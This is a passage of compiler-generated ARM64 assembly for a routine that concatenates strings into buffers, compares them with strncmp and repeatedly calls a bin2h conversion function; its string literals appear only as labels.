Reload ldr x0, [sp, #312] ; 8-byte Folded Reload adrp x1, l_.str.32@PAGE add x1, x1, l_.str.32@PAGEOFF bl ___strcat_chk ldr x1, [sp, #344] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #408] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #344] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #416] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #344] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #440] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #352] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #320] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #352] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #328] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #352] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #336] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #344] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #392] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #352] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #360] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #368] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #376] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #384] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #392] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #400] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #408] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #416] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #440] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #368] ; 8-byte Folded Reload adrp x1, l_.str.33@PAGE add x1, x1, l_.str.33@PAGEOFF str x1, [sp, #424] ; 8-byte Folded Spill bl ___strcat_chk ldr x1, [sp, #424] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #376] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #424] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #384] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #424] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #392] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #424] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #400] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #424] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #408] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #424] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #416] ; 8-byte Folded Reload bl ___strcat_chk ldr x1, [sp, #424] ; 8-byte Folded Reload ldr x2, [sp, #432] ; 8-byte Folded Reload ldr x0, [sp, #440] ; 8-byte Folded Reload bl ___strcat_chk ldr x0, [sp, #576] adrp x1, l_.str.34@PAGE add x1, x1, l_.str.34@PAGEOFF mov x2, #7 bl _strncmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_30 b LBB1_23 LBB1_23: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #2456 adrp x1, l_.str.35@PAGE add x1, x1, l_.str.35@PAGEOFF mov x2, #512 str x2, [sp, #256] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #256] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #2456 adrp x1, l_.str.36@PAGE add x1, x1, l_.str.36@PAGEOFF bl ___strcat_chk add x0, sp, #2540 adrp x1, l_.str.37@PAGE add x1, x1, l_.str.37@PAGEOFF mov x2, #128 str x2, [sp, #264] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #256] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #1432 adrp x1, l_.str.38@PAGE add x1, x1, l_.str.38@PAGEOFF bl ___strcat_chk ldr x2, [sp, #256] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #1432 adrp x1, l_.str.39@PAGE add x1, x1, l_.str.39@PAGEOFF bl ___strcat_chk ldr x2, [sp, #264] ; 8-byte Folded Reload add x0, sp, #2284 adrp x1, l_.str.40@PAGE add x1, x1, l_.str.40@PAGEOFF bl ___strcat_chk ldr x0, [sp, #544] adrp x1, l_.str.41@PAGE add x1, x1, l_.str.41@PAGEOFF mov x2, #1 bl _strncmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_25 b LBB1_24 LBB1_24: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #3480 adrp x1, l_.str.42@PAGE add x1, x1, l_.str.42@PAGEOFF mov x2, #512 bl ___strcat_chk b LBB1_26 LBB1_25: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #3480 adrp x1, l_.str.43@PAGE add x1, x1, l_.str.43@PAGEOFF mov x2, #512 str x2, [sp, #248] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #248] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #3992 adrp x1, l_.str.44@PAGE add x1, x1, l_.str.44@PAGEOFF bl ___strcat_chk b LBB1_26 LBB1_26: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #3992 adrp x1, l_.str.45@PAGE add x1, x1, l_.str.45@PAGEOFF mov x2, #512 str x2, [sp, #232] ; 8-byte Folded Spill bl ___strcat_chk add x0, sp, #2028 adrp x1, l_.str.46@PAGE add x1, x1, l_.str.46@PAGEOFF mov x2, #128 str x2, [sp, #240] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #232] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #3480 adrp x1, l_.str.47@PAGE add x1, x1, l_.str.47@PAGEOFF bl ___strcat_chk ldr x2, [sp, #240] ; 8-byte Folded Reload add x0, sp, #2796 adrp x1, l_.str.48@PAGE add x1, x1, l_.str.48@PAGEOFF bl ___strcat_chk ldr x0, [sp, #536] adrp x1, l_.str.41@PAGE add x1, x1, l_.str.41@PAGEOFF mov x2, #1 bl _strncmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_28 b LBB1_27 LBB1_27: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #920 adrp x1, l_.str.49@PAGE add x1, x1, l_.str.49@PAGEOFF mov x2, #512 bl ___strcat_chk b LBB1_29 LBB1_28: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #920 adrp x1, l_.str.50@PAGE add x1, x1, l_.str.50@PAGEOFF mov x2, #512 bl ___strcat_chk b LBB1_29 LBB1_29: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #920 adrp x1, l_.str.51@PAGE add x1, x1, l_.str.51@PAGEOFF mov x2, #512 str x2, [sp, #152] ; 8-byte Folded Spill bl ___strcat_chk add x0, sp, #1900 adrp x1, l_.str.52@PAGE add x1, x1, l_.str.52@PAGEOFF mov x2, #128 str x2, [sp, #136] ; 8-byte Folded Spill bl ___strcat_chk ldr x3, [sp, #152] ; 8-byte Folded Reload mov w8, #1 str w8, [sp, #528] str w8, [sp, #516] str w8, [sp, #532] add x0, sp, #1388 str x0, [sp, #192] ; 8-byte Folded Spill add x1, sp, #2, lsl #12 ; =8192 add x1, x1, #2968 str x1, [sp, #176] ; 8-byte Folded Spill mov x2, x3 bl ___strncpy_chk ldr x3, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #176] ; 8-byte Folded Reload add x0, sp, #876 str x0, [sp, #224] ; 8-byte Folded Spill mov x2, x3 bl ___strncpy_chk ldr x2, [sp, #136] ; 8-byte Folded Reload add x0, sp, #2668 str x0, [sp, #160] ; 8-byte Folded Spill adrp x1, l_.str.53@PAGE add x1, x1, l_.str.53@PAGEOFF bl ___strcat_chk ldr x2, [sp, #136] ; 8-byte Folded Reload add x0, sp, #748 str x0, [sp, #184] ; 8-byte Folded Spill adrp x1, l_.str.54@PAGE add x1, x1, l_.str.54@PAGEOFF bl ___strcat_chk ldr x2, [sp, #136] ; 8-byte Folded Reload add x0, sp, #620 str x0, [sp, #208] ; 8-byte Folded Spill adrp x1, l_.str.55@PAGE add x1, x1, l_.str.55@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload adrp x1, l_.str.56@PAGE add x1, x1, l_.str.56@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload adrp x1, l_.str.57@PAGE add x1, x1, l_.str.57@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload adrp x1, l_.str.58@PAGE add x1, x1, l_.str.58@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #2968 str x0, [sp, #200] ; 8-byte Folded Spill adrp x1, l_.str.59@PAGE add x1, x1, l_.str.59@PAGEOFF bl ___strcat_chk ldr x2, [sp, #160] ; 8-byte Folded Reload ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF str x3, [sp, #168] ; 8-byte Folded Spill bl _bin2h ldr x2, [sp, #184] ; 8-byte Folded Reload ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload adrp x3, l_.str.61@PAGE add x3, x3, l_.str.61@PAGEOFF str x3, [sp, #216] ; 8-byte Folded Spill bl _bin2h ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x2, [sp, #208] ; 8-byte Folded Reload ldr x3, [sp, #216] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload bl _bin2h ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload bl _bzero ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #160] ; 8-byte Folded Reload mov w1, #0 str w1, [sp, #116] ; 4-byte Folded Spill bl _memset ldr x0, [sp, #184] ; 8-byte Folded Reload ldr w1, [sp, #116] ; 4-byte Folded Reload ldr x2, [sp, #136] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #208] ; 8-byte Folded Reload ldr w1, [sp, #116] ; 4-byte Folded Reload ldr x2, [sp, #136] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #176] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload adrp x1, l_.str.30@PAGE add x1, x1, l_.str.30@PAGEOFF str x1, [sp, #120] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload adrp x1, l_.str.33@PAGE add x1, x1, l_.str.33@PAGEOFF str x1, [sp, #128] ; 8-byte Folded Spill bl ___strcat_chk ldr x3, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #176] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload mov x2, x3 bl ___strncpy_chk ldr x3, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #176] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload mov x2, x3 bl ___strncpy_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #160] ; 8-byte Folded Reload adrp x1, l_.str.62@PAGE add x1, x1, l_.str.62@PAGEOFF bl ___strcat_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #184] ; 8-byte Folded Reload adrp x1, l_.str.63@PAGE add x1, x1, l_.str.63@PAGEOFF bl ___strcat_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #208] ; 8-byte Folded Reload adrp x1, l_.str.64@PAGE add x1, x1, l_.str.64@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload adrp x1, l_.str.65@PAGE add x1, x1, l_.str.65@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload adrp x1, l_.str.66@PAGE add x1, x1, l_.str.66@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload adrp x1, l_.str.67@PAGE add x1, x1, l_.str.67@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload adrp x1, l_.str.32@PAGE add x1, x1, l_.str.32@PAGEOFF str x1, [sp, #144] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload adrp x1, l_.str.68@PAGE add x1, x1, l_.str.68@PAGEOFF bl ___strcat_chk ldr x2, [sp, #160] ; 8-byte Folded Reload ldr x3, [sp, #168] ; 8-byte Folded Reload ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl _bin2h ldr x2, [sp, #184] ; 8-byte Folded Reload ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x3, [sp, #216] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload bl _bin2h ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x2, [sp, #208] ; 8-byte Folded Reload ldr x3, [sp, #216] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload bl _bin2h ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload bl _bzero ldr w1, [sp, #116] ; 4-byte Folded Reload ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #160] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #184] ; 8-byte Folded Reload ldr w1, [sp, #116] ; 4-byte Folded Reload ldr x2, [sp, #136] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #208] ; 8-byte Folded Reload ldr w1, [sp, #116] ; 4-byte Folded Reload ldr x2, [sp, #136] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #176] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x1, [sp, #120] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x1, [sp, #128] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl ___strcat_chk ldr x3, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #176] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload mov x2, x3 bl ___strncpy_chk ldr x3, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #176] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload mov x2, x3 bl ___strncpy_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #160] ; 8-byte Folded Reload adrp x1, l_.str.69@PAGE add x1, x1, l_.str.69@PAGEOFF bl ___strcat_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #184] ; 8-byte Folded Reload adrp x1, l_.str.70@PAGE add x1, x1, l_.str.70@PAGEOFF bl ___strcat_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #208] ; 8-byte Folded Reload adrp x1, l_.str.71@PAGE add x1, x1, l_.str.71@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload adrp x1, l_.str.72@PAGE add x1, x1, l_.str.72@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload adrp x1, l_.str.73@PAGE add x1, x1, l_.str.73@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload adrp x1, l_.str.74@PAGE add x1, x1, l_.str.74@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x1, [sp, #144] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload adrp x1, l_.str.75@PAGE add x1, x1, l_.str.75@PAGEOFF bl ___strcat_chk ldr x2, [sp, #160] ; 8-byte Folded Reload ldr x3, [sp, #168] ; 8-byte Folded Reload ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl _bin2h ldr x2, [sp, #184] ; 8-byte Folded Reload ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x3, [sp, #216] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload bl _bin2h ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x2, [sp, #208] ; 8-byte Folded Reload ldr x3, [sp, #216] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload bl _bin2h ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload bl _bzero ldr w1, [sp, #116] ; 4-byte Folded Reload ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #160] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #184] ; 8-byte Folded Reload ldr w1, [sp, #116] ; 4-byte Folded Reload ldr x2, [sp, #136] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #208] ; 8-byte Folded Reload ldr w1, [sp, #116] ; 4-byte Folded Reload ldr x2, [sp, #136] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #176] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x1, [sp, #120] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x1, [sp, #128] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl ___strcat_chk ldr x3, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #176] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload mov x2, x3 bl ___strncpy_chk ldr x3, [sp, #152] ; 8-byte Folded Reload ldr x1, [sp, #176] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload mov x2, x3 bl ___strncpy_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #160] ; 8-byte Folded Reload adrp x1, l_.str.76@PAGE add x1, x1, l_.str.76@PAGEOFF bl ___strcat_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #184] ; 8-byte Folded Reload adrp x1, l_.str.77@PAGE add x1, x1, l_.str.77@PAGEOFF bl ___strcat_chk ldr x2, [sp, #136] ; 8-byte Folded Reload ldr x0, [sp, #208] ; 8-byte Folded Reload adrp x1, l_.str.78@PAGE add x1, x1, l_.str.78@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload adrp x1, l_.str.79@PAGE add x1, x1, l_.str.79@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload adrp x1, l_.str.80@PAGE add x1, x1, l_.str.80@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload adrp x1, l_.str.81@PAGE add x1, x1, l_.str.81@PAGEOFF bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x1, [sp, #144] ; 8-byte Folded Reload ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #152] ; 8-byte Folded Reload ldr x0, [sp, #200] ; 8-byte Folded Reload adrp x1, l_.str.82@PAGE add x1, x1, l_.str.82@PAGEOFF bl ___strcat_chk ldr x2, [sp, #160] ; 8-byte Folded Reload ldr x3, [sp, #168] ; 8-byte Folded Reload ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x0, [sp, #176] ; 8-byte Folded Reload bl _bin2h ldr x2, [sp, #184] ; 8-byte Folded Reload ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x3, [sp, #216] ; 8-byte Folded Reload ldr x0, [sp, #192] ; 8-byte Folded Reload bl _bin2h ldr x1, [sp, #200] ; 8-byte Folded Reload ldr x2, [sp, #208] ; 8-byte Folded Reload ldr x3, [sp, #216] ; 8-byte Folded Reload ldr x0, [sp, #224] ; 8-byte Folded Reload bl _bin2h b LBB1_37 LBB1_30: ; in Loop: Header=BB1_21 Depth=1 ldr x0, [sp, #576] adrp x1, l_.str.83@PAGE add x1, x1, l_.str.83@PAGEOFF mov x2, #7 bl _strncmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_35 b LBB1_31 LBB1_31: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #2456 adrp x1, l_.str.84@PAGE add x1, x1, l_.str.84@PAGEOFF mov x2, #512 str x2, [sp, #96] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #96] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #2456 adrp x1, l_.str.85@PAGE add x1, x1, l_.str.85@PAGEOFF bl ___strcat_chk add x0, sp, #2540 adrp x1, l_.str.86@PAGE add x1, x1, l_.str.86@PAGEOFF mov x2, #128 str x2, [sp, #104] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #96] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #1944 adrp x1, l_.str.87@PAGE add x1, x1, l_.str.87@PAGEOFF bl ___strcat_chk ldr x2, [sp, #96] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #1944 adrp x1, l_.str.88@PAGE add x1, x1, l_.str.88@PAGEOFF bl ___strcat_chk ldr x2, [sp, #104] ; 8-byte Folded Reload add x0, sp, #2412 adrp x1, l_.str.89@PAGE add x1, x1, l_.str.89@PAGEOFF bl ___strcat_chk ldr x0, [sp, #544] adrp x1, l_.str.41@PAGE add x1, x1, l_.str.41@PAGEOFF mov x2, #1 bl _strncmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_33 b LBB1_32 LBB1_32: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #3480 adrp x1, l_.str.90@PAGE add x1, x1, l_.str.90@PAGEOFF mov x2, #512 bl ___strcat_chk b LBB1_34 LBB1_33: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #3480 adrp x1, l_.str.91@PAGE add x1, x1, l_.str.91@PAGEOFF mov x2, #512 bl ___strcat_chk b LBB1_34 LBB1_34: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #408 adrp x1, l_.str.92@PAGE add x1, x1, l_.str.92@PAGEOFF mov x2, #512 str x2, [sp, #56] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #3480 adrp x1, l_.str.93@PAGE add x1, x1, l_.str.93@PAGEOFF bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #408 adrp x1, l_.str.94@PAGE add x1, x1, l_.str.94@PAGEOFF bl ___strcat_chk add x0, sp, #2796 adrp x1, l_.str.95@PAGE add x1, x1, l_.str.95@PAGEOFF mov x2, #128 str x2, [sp, #40] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #40] ; 8-byte Folded Reload add x0, sp, #2156 adrp x1, l_.str.96@PAGE add x1, x1, l_.str.96@PAGEOFF bl ___strcat_chk ldr x2, [sp, #40] ; 8-byte Folded Reload mov w8, #1 str w8, [sp, #532] str w8, [sp, #528] str w8, [sp, #520] add x0, sp, #2668 str x0, [sp, #72] ; 8-byte Folded Spill adrp x1, l_.str.97@PAGE add x1, x1, l_.str.97@PAGEOFF bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #2968 str x0, [sp, #88] ; 8-byte Folded Spill adrp x1, l_.str.98@PAGE add x1, x1, l_.str.98@PAGEOFF bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #2968 str x0, [sp, #64] ; 8-byte Folded Spill adrp x1, l_.str.99@PAGE add x1, x1, l_.str.99@PAGEOFF bl ___strcat_chk ldr x1, [sp, #64] ; 8-byte Folded Reload ldr x2, [sp, #72] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF str x3, [sp, #80] ; 8-byte Folded Spill bl _bin2h ldr x1, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #64] ; 8-byte Folded Reload bl _bzero ldr x2, [sp, #40] ; 8-byte Folded Reload ldr x0, [sp, #72] ; 8-byte Folded Reload mov w1, #0 str w1, [sp, #20] ; 4-byte Folded Spill bl _memset ldr x0, [sp, #88] ; 8-byte Folded Reload ldr x2, [sp, #56] ; 8-byte Folded Reload ldr 